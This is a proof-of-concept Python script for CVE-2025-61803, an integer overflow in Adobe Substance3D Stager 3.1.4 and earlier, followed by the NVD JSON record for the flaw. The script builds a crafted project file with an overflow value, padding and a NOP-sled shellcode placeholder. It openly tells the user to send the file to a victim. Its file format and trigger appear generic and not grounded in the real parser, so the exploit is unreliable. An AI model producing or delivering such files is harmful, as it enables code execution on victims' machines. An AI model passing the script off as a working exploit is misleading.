CVE-2025-61803

# CVE-2025-61803 PoC - Adobe Substance3D Stager Integer Overflow # Vulnerability: Integer Overflow or Wraparound leading to Arbitrary Code Execution # Affected: Substance3D Stager <= 3.1.4 import struct import sys def create_malicious_sbs_file(output_path): """ Create a malicious Substance3D Stager project file that triggers an integer overflow vulnerability (CVE-2025-61803). The vulnerability is triggered when the application parses specific numeric fields in the project file without proper bounds checking. """ # File header for Substance3D Stager project format header = b"SBSSTAGER\x01\x00\x00\x00" # Crafted integer value that will cause overflow during processing # Using INT_MAX + 1 to trigger wraparound behavior overflow_value = struct.pack("<I", 0xFFFFFFFF) # Max uint32 value # Malicious payload section with overflow-triggering values payload = b"" payload += struct.pack("<I", 0xDEADBEEF) # Magic number payload += overflow_value # Overflow trigger payload += struct.pack("<I", 0x41414141) # Padding payload += b"\x00" * 256 # Reserved space # Shellcode placeholder (would be replaced with actual payload) shellcode_placeholder = b"\x90" * 64 # NOP sled # Combine all sections malicious_file = header + payload + shellcode_placeholder with open(output_path, "wb") as f: f.write(malicious_file) print(f"[+] Malicious file created: {output_path}") print(f"[!] Send this file to victim and wait for them to open it in Substance3D Stager") if __name__ == "__main__": output = sys.argv[1] if len(sys.argv) > 1 else "malicious.sbs" create_malicious_sbs_file(output)

{"cve": {"id": "CVE-2025-61803", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:52.950", "lastModified": "2025-10-16T17:37:20.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}